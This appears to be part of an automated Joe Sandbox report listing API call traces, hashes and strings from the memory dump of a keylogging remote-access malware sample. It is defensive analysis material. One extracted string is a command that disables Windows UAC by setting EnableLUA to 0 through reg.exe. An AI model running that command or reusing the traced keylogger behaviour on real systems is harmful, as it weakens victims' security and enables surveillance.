                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                      • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                      • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                                      • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                      • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                      • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                                      • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PkGNG
                                                      • API String ID: 0-263838557
                                                      • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                      • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                      • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                      • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                      • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                      • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                      • String ID: PkGNG
                                                      • API String ID: 3360349984-263838557
                                                      • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                      • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                      • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                      • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                      • wsprintfW.USER32 ref: 0040B22E
                                                        • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EventLocalTimewsprintf
                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                      • API String ID: 1497725170-248792730
                                                      • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                      • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                      • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                      • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                      • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                      • String ID: XQG
                                                      • API String ID: 1958988193-3606453820
                                                      • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                      • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                      • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                      • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                      APIs
                                                      • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                      • GetLastError.KERNEL32 ref: 0041D611
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                      • String ID: 0$MsgWindowClass
                                                      • API String ID: 2877667751-2410386613
                                                      • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                      • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                      • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                      • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                      APIs
                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                      • CloseHandle.KERNEL32(?), ref: 004077E5
                                                      • CloseHandle.KERNEL32(?), ref: 004077EA
                                                      Strings
                                                      • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$CreateProcess
                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                      • API String ID: 2922976086-4183131282
                                                      • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                      • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                      • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                      • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                      Strings
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                                      • SG, xrefs: 00407715
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      • API String ID: 0-1732489412
                                                      • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                      • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                      • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                      • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                      • SetEvent.KERNEL32(?), ref: 0040512C
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                      • CloseHandle.KERNEL32(?), ref: 00405140
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                      • String ID: KeepAlive | Disabled
                                                      • API String ID: 2993684571-305739064
                                                      • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                      • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                      • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                      • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                      APIs
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                      • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                      • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                                      • String ID: Alarm triggered
                                                      • API String ID: 614609389-2816303416
                                                      • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                      • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                      • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                      • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                      Strings
                                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                      • API String ID: 3024135584-2418719853
                                                      • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                      • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                      • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                      • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                      • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                      • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                      • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                      • _free.LIBCMT ref: 0044943D
                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                      • _free.LIBCMT ref: 00449609
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                      • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                      • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                      • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                      APIs
                                                        • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                        • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                        • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 4269425633-0
                                                      • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                      • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                      • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                      • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                      • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                      • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                      • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                      • _free.LIBCMT ref: 0044F43F
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                      • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                      • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                      • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreatePointerWrite
                                                      • String ID:
                                                      • API String ID: 1852769593-0
                                                      • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                      • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                      • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                      • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                      APIs
                                                      • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                      • _free.LIBCMT ref: 00448353
                                                      • _free.LIBCMT ref: 0044837A
                                                      • SetLastError.KERNEL32(00000000), ref: 00448387
                                                      • SetLastError.KERNEL32(00000000), ref: 00448390
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                      • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                      • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                      • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                      APIs
                                                      • _free.LIBCMT ref: 00450A54
                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                      • _free.LIBCMT ref: 00450A66
                                                      • _free.LIBCMT ref: 00450A78
                                                      • _free.LIBCMT ref: 00450A8A
                                                      • _free.LIBCMT ref: 00450A9C
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                      • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                      • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                      APIs
                                                      • _free.LIBCMT ref: 00444106
                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                      • _free.LIBCMT ref: 00444118
                                                      • _free.LIBCMT ref: 0044412B
                                                      • _free.LIBCMT ref: 0044413C
                                                      • _free.LIBCMT ref: 0044414D
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                      • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                      • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                      • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PkGNG
                                                      • API String ID: 0-263838557
